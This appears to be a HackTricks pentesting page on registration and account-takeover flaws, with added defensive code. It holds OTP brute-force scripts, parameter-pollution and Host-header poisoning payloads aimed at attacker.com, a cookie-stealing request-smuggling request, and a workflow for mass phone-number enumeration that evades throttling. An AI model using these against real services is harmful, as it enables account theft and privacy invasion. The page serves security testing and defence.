Registration & Takeover Vulnerabilities

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Registration Takeover

Duplicate Registration

  • Try to register with an existing username
  • Check variations of the email:
    • uppercase
    • +1@
    • add some dots in the email
    • special characters in the email name (%00, %09, %20)
    • put blank characters after the email: test@test.com a
    • victim@gmail.com@attacker.com
    • victim@attacker.com@gmail.com
  • Try the email provider's canonicalization tricks (provider dependent):
    • Gmail ignores dots and subaddressing: victim+1@gmail.com and v.ic.tim@gmail.com both deliver to victim@gmail.com
    • Some providers are case-insensitive in the local-part
    • Some providers accept Unicode confusables; try homoglyphs and the soft hyphen \u00AD inside the local-part
  • Abuse these to: bypass uniqueness checks, obtain duplicate accounts/workspace invites, or block the victim's sign-up (temporary DoS) while you prepare the takeover

Username Enumeration

Check whether you can figure out when a username has already been registered inside the application.

  • Different error messages or different HTTP status codes
  • Timing differences (an existing user may trigger a lookup in the IdP/DB)
  • Registration-form autofill of profile data for known emails
  • Check team/invite flows: entering an email may reveal whether the account exists

Password Policy

While creating a user, check the password policy (check whether weak passwords are accepted).
In that case you can try to brute-force credentials.

SQL Injection

Check this page to learn how to attempt account takeovers or extract information via SQL Injections in registration forms.

Oauth Takeovers

OAuth to Account takeover

SAML Vulnerabilities

SAML Attacks

Change Email

Once registered, try to change the email and check whether this change is correctly validated or whether it can be changed to any arbitrary email.

More Checks

  • Check whether you can use disposable emails (mailinator, yopmail, 1secmail, etc.) or bypass the blocklist with subaddressing such as victim+mailinator@gmail.com
  • Long password (>200) may lead to DoS
  • Check rate limits on account creation
  • Use username@burp_collab.net and analyze the callback
  • If there is phone-number verification, check phone parsing/injection edge cases

Phone Number Injections

Captcha Bypass

Contact-discovery / identifier-enumeration oracles

Phone-number-centric messengers expose a presence oracle every time a client synchronizes its contacts. Replaying WhatsApp's discovery requests historically sustained >100M lookups per hour, allowing near-complete account enumeration.

Attack workflow

  1. Instrument an official client to capture the address-book upload request (an authenticated blob of numbers normalized to E.164). Replay it with attacker-crafted numbers while reusing the same cookies/device token.
  2. Batch numbers per request: WhatsApp accepts thousands of identifiers and returns registered/unregistered together with metadata (business, companion, etc.). Parse the responses offline to build target lists without messaging the victims.
  3. Horizontally scale the enumeration with SIM banks, cloud devices, or residential proxies so that per-account/IP/ASN throttling never kicks in.

Dialing-plan modeling

Model each country's dialing plan to skip invalid candidates. The NDSS dataset (country-table.*) lists country codes, adoption density, and platform split so you can prioritise ranges with many hits. Example seeding code:

```python
import pandas as pd
from itertools import product

candidates = []  # work queue consumed by the lookup workers (assumed helper, not defined in the original)


def enqueue(number):
    candidates.append(number)


df = pd.read_csv("country-table.csv")          # NDSS country table
row = df[df["Country"] == "India"].iloc[0]     # adoption density / platform split for this country
prefix = "+91"  # India mobile numbers are 10 digits
for suffix in product("0123456789", repeat=10):  # 10^10 candidates: restrict to real NDC allocations first
    candidate = prefix + "".join(suffix)
    enqueue(candidate)
```

Prioritise prefixes that match real allocations (Mobile Country Code + National Destination Code) before querying the oracle to keep throughput useful.
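From the defender's side, the throttling that step 3 of the workflow tries to outrun can be complemented with offline detection. The following is an added example (not from the original page or from WhatsApp): it groups constructed discovery-log records by account or source IP and flags principals whose sliding-window lookup volume exceeds a budget, or whose unregistered ratio looks like number guessing rather than a genuine address-book sync. Thresholds and record fields are assumptions.

```python
from collections import defaultdict

# Constructed sample records from a hypothetical contact-discovery endpoint:
# one normal user syncing an address book, one client replaying large batches
# of mostly unregistered numbers from two source IPs.
SAMPLE_LOG = [
    {"ts": 0,    "account": "u1", "ip": "203.0.113.5",  "batch": 340,  "unregistered": 120},
    {"ts": 3600, "account": "u1", "ip": "203.0.113.5",  "batch": 12,   "unregistered": 3},
    {"ts": 0,    "account": "u2", "ip": "198.51.100.9", "batch": 5000, "unregistered": 4800},
    {"ts": 60,   "account": "u2", "ip": "198.51.100.9", "batch": 5000, "unregistered": 4750},
    {"ts": 120,  "account": "u2", "ip": "198.51.100.7", "batch": 5000, "unregistered": 4790},
]

WINDOW = 3600         # seconds of history considered per principal
LOOKUP_BUDGET = 8000  # numbers one principal may resolve per window
UNREG_RATIO = 0.90    # guessed numbers are overwhelmingly unregistered
MIN_SAMPLE = 1000     # do not judge the ratio on tiny address books


def detect_enumeration(log, key="account", window=WINDOW,
                       budget=LOOKUP_BUDGET, ratio=UNREG_RATIO):
    """Group records by `key` (account, ip, asn, ...) and return {principal: reason}
    for those whose sliding-window volume exceeds the budget or whose
    unregistered ratio looks like number guessing rather than a real sync."""
    groups = defaultdict(list)
    for rec in log:
        groups[rec[key]].append(rec)
    flagged = {}
    for principal, recs in groups.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end, cur in enumerate(recs):
            while recs[start]["ts"] < cur["ts"] - window:   # drop records older than the window
                start += 1
            window_recs = recs[start:end + 1]
            total = sum(r["batch"] for r in window_recs)
            unreg = sum(r["unregistered"] for r in window_recs)
            if total > budget:
                flagged[principal] = f"{total} lookups within {window}s exceeds budget {budget}"
                break
            if total >= MIN_SAMPLE and unreg / total >= ratio:
                flagged[principal] = f"unregistered ratio {unreg / total:.2f} over {total} lookups"
                break
    return flagged
```

Running the same detector with `key="ip"` catches harnesses that rotate accounts but not egress addresses; an ASN column would extend it to proxy pools.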

Turning enumerations into targeted attacks

  • Feed leaked phone numbers (e.g., Facebook’s 2021 breach) into the oracle to learn which identities are still active before phishing, SIM-swapping, or spamming.
  • Slice censuses by country/OS/app type to find regions with weak SMS filtering or heavy WhatsApp Business adoption for localized social engineering.

Public-key reuse correlation

WhatsApp exposes each account’s X25519 identity key during session setup. Request identity material for every enumerated number and deduplicate the public keys to reveal account farms, cloned clients, or insecure firmware—shared keys deanonymize multi-SIM operations.

The registration process usually verifies ownership through a numeric OTP or a magic-link token. Common weaknesses:

  • Guessable or short OTP (4–6 digits) with no effective rate limiting or IP/device tracking. Try parallel guesses and header/IP rotation.
  • OTP reuse across actions or accounts, or not bound to the specific user/action (e.g., the same code works for login and signup, or still works after the email is changed).
  • Multi-value smuggling: some backends accept multiple codes and verify if any matches. Try:
    • code=000000&code=123456
    • JSON arrays: {"code":["000000","123456"]}
    • Mixed parameter names: otp=000000&one_time_code=123456
    • Comma/pipe separated values: code=000000,123456 or code=000000|123456
  • Response oracle: distinguish wrong vs expired vs wrong-user codes by status/message/body length.
  • Tokens not invalidated after success or after a password/email change.
  • Verification token not tied to user agent/IP, allowing cross-origin completion from attacker-controlled pages.

Bruteforcing example with ffuf against a JSON OTP endpoint:

```bash
ffuf -w <wordlist_of_codes> -u https://target.tld/api/verify -X POST \
  -H 'Content-Type: application/json' \
  -d '{"email":"victim@example.com","code":"FUZZ"}' \
  -fr 'Invalid|Too many attempts' -mc all
```

Parallel/concurrent guessing to bypass sequential lockouts (use Turbo Intruder in Burp):

Turbo Intruder snippet to flood 6-digit OTP attempts:

```python
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100)
    for code in range(0, 1000000):
        body = '{"email":"victim@example.com","code":"%06d"}' % code
        engine.queue(target.req, body=body)


def handleResponse(req, interesting):
    # keep only responses that do not look like the standard rejection
    if req.status != 401 and b'Invalid' not in req.response:
        table.add(req)
```

- Try racing the verification: submit the same valid OTP simultaneously in two sessions; sometimes one session becomes the attacker's verified account while the victim's flow also succeeds.
- Also try Host header poisoning on verification links (like the reset poisoning below) to leak or complete the verification on an attacker-controlled host.

<a class="content_ref" href="rate-limit-bypass.md"><span class="content_ref_label">Rate Limit Bypass</span></a>

<a class="content_ref" href="2fa-bypass.md"><span class="content_ref_label">2FA/MFA/OTP Bypass</span></a>

<a class="content_ref" href="email-injections.md"><span class="content_ref_label">Email Injections</span></a>

## Account Pre‑Hijacking Techniques (before the victim signs up)

A powerful class of issues arises when the attacker performs actions on the victim's email address before the victim creates their account, and then regains access later.

Key techniques to try (customise to the target's flows):

- Classic–Federated Merge
  - Attacker: registers a classic account with the victim's email and sets a password
  - Victim: later signs up via SSO (same email)
  - Unsafe merging can leave both parties logged in or restore the attacker's access
- Unexpired Session Identifier
  - Attacker: creates the account and keeps a long-lived session alive (never logs out)
  - Victim: resets/sets the password and uses the account
  - Test whether old sessions remain valid after a reset or after MFA is enabled
- Trojan Identifier
  - Attacker: adds a second identifier to the pre-created account (phone, extra email, or linking the attacker's IdP)
  - Victim: resets the password; the attacker later uses the trojan identifier to reset/log in
- Unexpired Email Change
  - Attacker: starts an email change to the attacker's address and withholds the confirmation
  - Victim: recovers the account and starts using it
  - Attacker: later completes the pending email change to hijack the account
- Non‑Verifying IdP
  - Attacker: uses an IdP that does not verify email ownership to claim `victim@…`
  - Victim: signs up via the classic path
  - The service links by email without checking `email_verified` or performing its own verification

Practical tips

- Pull flows and endpoints from web/mobile bundles. Look for classic signup, SSO linking, email/phone change, and password reset endpoints.
- Build real automation to keep sessions alive while you exercise the other flows.
- For SSO tests, stand up a test OIDC provider and issue tokens with `email` claims for the victim's address and `email_verified=false` to check whether the RP trusts unverified IdPs.
- After any password reset or email change, verify that:
  - all other sessions and tokens are revoked/unusable,
  - pending email/phone change capabilities are cancelled,
  - previously linked IdPs/emails/phones are re-verified.

Note: Extensive methodology and case studies of these techniques are documented by Microsoft’s pre‑hijacking research (see References at the end).
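The three invariants in the checklist above map directly onto code. The following is an added example, not from the original page or from any real product: a minimal account model whose password reset tears down everything an attacker could have parked on the account (sessions, a withheld email change, linked IdPs) and whose federated merge refuses claims that are not a boolean `email_verified=true` for the same address. All names are hypothetical.

```python
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Set


@dataclass
class Account:
    email: str
    password_hash: str = ""
    sessions: Set[str] = field(default_factory=set)
    pending_email_change: Optional[str] = None
    linked_idps: Dict[str, bool] = field(default_factory=dict)  # issuer -> verified?


def reset_password(acct: Account, new_hash: str) -> str:
    """Rotate the credential and remove every pre-hijack foothold;
    returns the single session id that remains valid."""
    acct.password_hash = new_hash
    acct.sessions.clear()                  # kills any long-lived pre-hijack session
    acct.pending_email_change = None       # cancels a withheld email change
    for issuer in acct.linked_idps:        # linked IdPs must be proven again
        acct.linked_idps[issuer] = False
    sid = secrets.token_urlsafe(32)
    acct.sessions.add(sid)
    return sid


def link_federated_login(acct: Account, claims: dict) -> bool:
    """Merge an OIDC login into an existing account only when the IdP asserts a
    verified address for exactly this email; anything else must go through an
    in-house verification step instead of an automatic merge."""
    same_email = claims.get("email", "").casefold() == acct.email.casefold()
    verified = claims.get("email_verified") is True   # boolean true only, not "true" or 1
    if not (same_email and verified):
        return False
    acct.linked_idps[claims["iss"]] = True
    return True


def complete_email_change(acct: Account, new_email: str) -> bool:
    """A confirmation link only succeeds if that exact change is still pending."""
    if acct.pending_email_change != new_email:
        return False
    acct.email, acct.pending_email_change = new_email, None
    return True
```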

<a class="content_ref" href="reset-password.md"><span class="content_ref_label">Reset/Forgotten Password Bypass</span></a>

<a class="content_ref" href="race-condition.md"><span class="content_ref_label">Race Condition</span></a>

## **Password Reset Takeover**

### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. Request a password reset for your email address
2. Click the password reset link
3. Don't change the password
4. Click any 3rd-party website (e.g. Facebook, Twitter)
5. Intercept the request in the Burp Suite proxy
6. Check whether the referer header is leaking the password reset token.

### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Intercept the password reset request in Burp Suite
2. Add or edit the following headers in Burp Suite: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Forward the request with the modified header

   ```http
   POST https://example.com/reset.php HTTP/1.1
   Accept: */*
   Content-Type: application/json
   Host: attacker.com
   ```

4. Look for a password reset URL based on the _host header_ such as: `https://attacker.com/reset-password.php?token=TOKEN`

### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
```
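The email-parameter tricks above, the OTP multi-value smuggling listed earlier, and reset poisoning all exploit lenient request handling. The following is an added example (not from the original page): a reset-request handler that accepts exactly one scalar value per parameter (rejecting duplicate keys, arrays, alias parameters and separator-joined values) and derives the mailed link from configuration instead of the Host header. The vulnerable link builder is kept beside the fixed one for contrast; `CANONICAL_BASE` and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qs, urlencode

CANONICAL_BASE = "https://example.com"   # from configuration, never from the request
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


def single_value(params: dict, *names: str):
    """Return the one scalar value supplied under exactly one of `names`, or None
    when the request smuggles several (duplicate keys, arrays, aliases, separators)."""
    present = [n for n in names if n in params]
    if len(present) != 1:
        return None                                # otp=..&one_time_code=..
    value = params[present[0]]
    if isinstance(value, list):
        if len(value) != 1:
            return None                            # code=a&code=b or {"code":[a,b]}
        value = value[0]
    if not isinstance(value, str) or re.search(r"[\s,;|]", value):
        return None                                # a,b / a|b / CRLF header injection
    return value


def build_reset_link(headers: dict, token: str) -> str:
    """Vulnerable pattern, shown for contrast: trusts Host / X-Forwarded-Host."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host")
    return f"https://{host}/reset-password.php?" + urlencode({"token": token})


def build_reset_link_safe(token: str) -> str:
    """Fixed: the mailed link is derived from configuration only."""
    return f"{CANONICAL_BASE}/reset-password.php?" + urlencode({"token": token})


def handle_reset_request(raw_body: str, token: str):
    """Parse a form body, accept exactly one well-formed email and return the
    link that would be mailed, or None when the request must be rejected."""
    params = parse_qs(raw_body, keep_blank_values=True)
    email = single_value(params, "email")
    if email is None or not EMAIL_RE.fullmatch(email):
        return None
    return build_reset_link_safe(token)
```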

IDOR on API Parameters

  1. The attacker has to log in with their own account and go to the Change password feature.
  2. Start Burp Suite and intercept the request
  3. Send it to the repeater tab and edit the parameters: User ID/email

```http
POST /api/changepass
[...]
("form": {"email":"victim@email.com","password":"securepwd"})
```

Weak Password Reset Token

The password reset token should be randomly generated and unique every time.
Try to determine whether the token expires or whether it is always the same; in some cases the generation algorithm is weak and can be guessed. The following variables might be used by the algorithm.

  • Timestamp
  • UserID
  • Email of User
  • Firstname and Lastname
  • Date of Birth
  • Cryptography
  • Number only
  • Small token sequence (characters between [A-Z,a-z,0-9])
  • Token reuse
  • Token expiration date
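Each item in the list above is a property a reviewer can check in the issuing code. The following is an added example (not from the original page): a reset-token store that is unguessable (256 bits from the OS CSPRNG), stored only as a hash, expiring, single-use, bound to one account, and superseded by any newer token for the same user; a timestamp-derived token is kept beside it as the guessable pattern to avoid. Class and function names are hypothetical.

```python
import hashlib
import hmac
import secrets
import time

TOKEN_TTL = 15 * 60  # seconds a reset link stays valid


class ResetTokenStore:
    def __init__(self, now=time.time):
        self._now = now            # injectable clock (tests can move time forward)
        self._pending = {}         # sha256(token) -> (user_id, expires_at)

    def issue(self, user_id: str) -> str:
        """Return a fresh 256-bit token; only its hash is stored, so a DB leak
        or a logged response body does not hand out usable tokens."""
        token = secrets.token_urlsafe(32)
        digest = hashlib.sha256(token.encode()).hexdigest()
        # one outstanding reset per user: issuing again invalidates the old one
        self._pending = {d: v for d, v in self._pending.items() if v[0] != user_id}
        self._pending[digest] = (user_id, self._now() + TOKEN_TTL)
        return token

    def redeem(self, user_id: str, token: str) -> bool:
        """Consume the token exactly once; reject unknown, expired, or
        other-user tokens without revealing which check failed."""
        digest = hashlib.sha256(token.encode()).hexdigest()
        entry = self._pending.get(digest)
        if entry is None:
            return False
        owner, expires_at = entry
        if self._now() > expires_at or not hmac.compare_digest(owner.encode(), user_id.encode()):
            return False
        del self._pending[digest]   # single use
        return True


def weak_token(user_id: str, ts: float) -> str:
    """The guessable pattern to avoid: a digest of user id + request second is
    reproducible by anyone who knows the user and roughly when the reset was asked."""
    return hashlib.md5(f"{user_id}{int(ts)}".encode()).hexdigest()
```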

Leaking Password Reset Token

  1. Trigger a password reset request using the API/UI for a specific email, e.g.: test@mail.com
  2. Inspect the server response and check for resetToken
  3. Then use the token in a URL like https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Password Reset Via Username Collision

  1. Register on the system with a username identical to the victim's username, but with white spaces inserted before and/or after the username. e.g.: "admin "
  2. Request a password reset with your malicious username.
  3. Use the token sent to your email and reset the victim's password.
  4. Log in to the victim's account with the new password.

The platform CTFd was vulnerable to this attack.
See: CVE-2020-7245
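The username collision above and the email variants listed under Duplicate Registration share one root cause: uniqueness and lookup compare raw input instead of a canonical form. The following is an added example (not from the original page, CTFd, or any provider): a canonicalisation step that NFKC-folds, strips invisible characters such as the soft hyphen, trims and casefolds identifiers, rejects anything still containing whitespace or control characters, and for emails insists on exactly one local@domain pair. Provider-specific rules (Gmail dot-folding, subaddressing) are deliberately left out, since the page notes they depend on the provider; the normalisation rules here are this example's own.

```python
import unicodedata

# format/invisible characters that render as nothing or like a neighbour
INVISIBLE = {"\u00ad", "\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}


def _clean(value: str) -> str:
    value = unicodedata.normalize("NFKC", value)           # fullwidth, ligatures -> ASCII
    value = "".join(ch for ch in value if ch not in INVISIBLE)
    return value.strip()                                   # "admin " -> "admin"


def _has_unsafe_chars(value: str) -> bool:
    # any whitespace, or any Unicode control/format/surrogate/private-use char
    return any(ch.isspace() or unicodedata.category(ch).startswith("C") for ch in value)


def canonical_username(name: str):
    """Canonical form used for uniqueness and reset lookups, or None if the
    name still contains unsafe characters after cleaning."""
    name = _clean(name)
    if not name or _has_unsafe_chars(name):
        return None
    return name.casefold()


def canonical_email(addr: str):
    """Exactly one local@domain pair, no unsafe characters, casefolded."""
    addr = _clean(addr)
    if addr.count("@") != 1 or _has_unsafe_chars(addr):
        return None
    local, domain = addr.split("@")
    if not local or not domain or domain.strip(".") != domain:
        return None
    return f"{local.casefold()}@{domain.casefold()}"


def is_available(existing: set, candidate: str, kind: str) -> bool:
    """True only if the candidate is well-formed and its canonical form is not
    already registered; `existing` holds canonical values."""
    canon = canonical_username(candidate) if kind == "user" else canonical_email(candidate)
    return canon is not None and canon not in existing
```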

Account Takeover Via Cross Site Scripting

  1. Find an XSS inside the application or in a subdomain if the cookies are scoped to the parent domain: *.domain.com
  2. Leak the current session cookie
  3. Authenticate as the user using the cookie

Account Takeover Via HTTP Request Smuggling

  1. Use smuggler to detect the type of HTTP Request Smuggling (CL, TE, CL.TE)

```bash
git clone https://github.com/defparam/smuggler.git
cd smuggler
python3 smuggler.py -h
```

  2. Craft a request that will overwrite POST / HTTP/1.1 with the following data:
     GET http://something.burpcollaborator.net HTTP/1.1 X: with the goal of open-redirecting the victims to burpcollab and stealing their cookies
  3. The final request could look like the following

```http
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X
```

Hackerone reports exploiting this bug

Account Takeover via CSRF

  1. Create a payload for the CSRF, e.g.: "HTML form with auto-submit for a password change"
  2. Send the payload

Account Takeover via JWT

JSON Web Tokens might be used to authenticate a user.

  • Edit the JWT with another User ID / Email
  • Check for a weak JWT signature

JWT Vulnerabilities (Json Web Tokens)

Registration-as-Reset (Upsert on Existing Email)

Some signup handlers perform an upsert when the supplied email already exists. If the endpoint accepts a minimal body with email and password and does not enforce ownership verification, submitting the victim's email can overwrite their password pre-auth.

  • Discovery: harvest endpoint names from bundled JS (or mobile app traffic), then fuzz base paths such as /parents/application/v4/admin/FUZZ with ffuf/dirsearch.
  • Method hints: a GET that returns a message like "Only POST request is allowed." often reveals the right verb and that a JSON body is expected.
  • Minimal body observed in practice:

```json
{"email":"victim@example.com","password":"New@12345"}
```

PoC example:

```http
POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json

{"email":"victim@example.com","password":"New@12345"}
```

Impact: Full Account Takeover (ATO) without reset token, OTP, or email verification.
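The defect is a single line in the handler. The following is an added example (not from the original page or the affected application): the upsert-style handler beside a version that never touches an existing record, answers identically whether or not the email exists, and leaves a new account unusable until the address is confirmed out of band. The in-memory store and response shapes are hypothetical.

```python
import hashlib
import secrets

USERS = {}   # email -> {"pw": "salt:hash", "verified": bool}


def _hash_pw(password: str) -> str:
    salt = secrets.token_bytes(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2**12, r=8, p=1)
    return salt.hex() + ":" + digest.hex()


def register_upsert(email: str, password: str) -> dict:
    """Vulnerable pattern: an existing email is silently overwritten, so the
    signup endpoint doubles as an unauthenticated password reset."""
    USERS[email] = {"pw": _hash_pw(password), "verified": True}
    return {"status": 200, "created": True}


def register_safe(email: str, password: str) -> dict:
    """Fixed: never modify an existing record, return the same response either
    way (no enumeration oracle), and keep the new account unverified until the
    address is confirmed through a separate ownership check."""
    if email not in USERS:
        USERS[email] = {"pw": _hash_pw(password), "verified": False}
    return {"status": 202, "message": "Check your inbox to confirm your address"}
```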

References
